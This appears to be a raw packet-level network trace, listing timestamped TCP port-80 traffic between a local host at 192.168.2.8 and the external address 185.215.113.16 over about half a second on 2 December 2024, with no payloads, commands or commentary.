                                                                                                                                                                                                        Dec 2, 2024 07:37:56.614216089 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.615134954 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.615187883 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.615248919 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.616219044 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.616262913 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.616326094 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.617356062 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.617410898 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.617438078 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.618408918 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.618474007 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.618514061 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.619501114 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.619571924 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.619657040 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.620619059 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.620630026 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.620677948 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.621736050 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.621797085 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.621823072 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.622759104 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.622807026 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.622875929 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.623882055 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.623943090 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.623982906 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.625029087 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.625076056 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.625113010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.626056910 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.626069069 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.626135111 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.627120972 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.627194881 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.627249956 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.628226995 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.628297091 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.628328085 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.629313946 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.629364014 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.629396915 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.630400896 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.630475998 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.630513906 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.631500959 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.631563902 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.631603956 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.632592916 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.632648945 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.632714987 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.633687019 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.633778095 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.633801937 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.634766102 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.634869099 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.634922028 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.635807991 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.635857105 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.635898113 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.636939049 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.637047052 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.637052059 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.638036013 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.638079882 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.638093948 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.639149904 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.639173031 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.639216900 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.640201092 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.640306950 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.640311956 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.640820026 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.641346931 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.641426086 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.641469955 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.642373085 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.642436981 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.642494917 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.643461943 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.643513918 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.643559933 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.644848108 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.644897938 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.645019054 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.645734072 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.645777941 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.645787001 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.646760941 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.646828890 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.646899939 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.647794008 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.647876978 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.647905111 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.648902893 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.648960114 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.649000883 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.650037050 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.650085926 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.650131941 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.652939081 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.784517050 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.784643888 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.784823895 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.784967899 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.785005093 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.785960913 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.786102057 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.786156893 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.787045956 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.787058115 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.787102938 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.787471056 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.798388004 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.798409939 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.798592091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.798634052 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.798669100 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.799709082 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.800148964 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.800307035 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.800385952 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.801054001 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.801147938 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.801201105 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.801856995 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.801923037 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.801966906 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.802969933 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.803056002 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.803103924 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.804034948 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.804156065 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.804264069 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.805136919 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.805325985 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.805550098 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.806220055 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.806310892 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.806519032 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.807308912 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.807421923 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.807471037 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.808419943 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.808514118 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.808590889 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.809519053 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.809613943 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.810570955 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.810617924 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.810679913 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.811791897 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.811805964 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.811825991 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.812186956 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.812794924 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.812809944 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.812916994 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.813873053 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.813990116 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.814224005 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.814964056 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.815043926 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.815115929 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.816102028 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.816222906 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.816287994 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.817133904 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.817157030 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.817234993 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.818268061 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.818336010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.818428040 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.819350004 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.819449902 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.819593906 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.820379972 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.820501089 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.820560932 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.821553946 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.821604967 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.822474003 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.822573900 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.822663069 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.822721958 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.823668003 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.823805094 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.823915005 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.824727058 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.824852943 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.825064898 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.825836897 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.826059103 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.826334953 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.826947927 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.827049017 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.827415943 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.828035116 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.828154087 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.829000950 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.829087019 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.829221010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.829349995 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.830199003 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.830305099 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.830396891 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.831269979 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.831437111 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.831520081 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.832356930 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.832487106 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.832607985 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.833472013 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.833564043 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.833621979 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.834538937 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.834656954 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.834929943 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.835678101 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.835747957 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.836745977 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.836853981 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.836874008 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.837003946 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.837812901 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.837965012 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.838160992 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.838597059 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.838912010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.839029074 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.839267969 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.840284109 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.840303898 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.841082096 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.841202021 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.841223001 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.841394901 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.842168093 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.842284918 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.842360020 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.843240976 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.843364000 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.843422890 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.844358921 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.844465017 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.844516993 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.845428944 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.845525980 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.845627069 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.846518040 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.846636057 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.846735954 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.847632885 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.847696066 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.847930908 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.848709106 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.848839998 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.849402905 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.849781990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.849920034 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.850042105 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.850873947 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.851028919 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.851219893 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.851993084 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.897025108 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.986098051 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.986195087 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.986329079 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.986695051 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.986823082 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.987055063 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.987731934 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.987845898 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.988796949 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.988926888 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.999788046 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.999881029 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.999937057 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.000360966 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.000495911 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.000720978 CET4971980192.168.2.8185.215.113.16
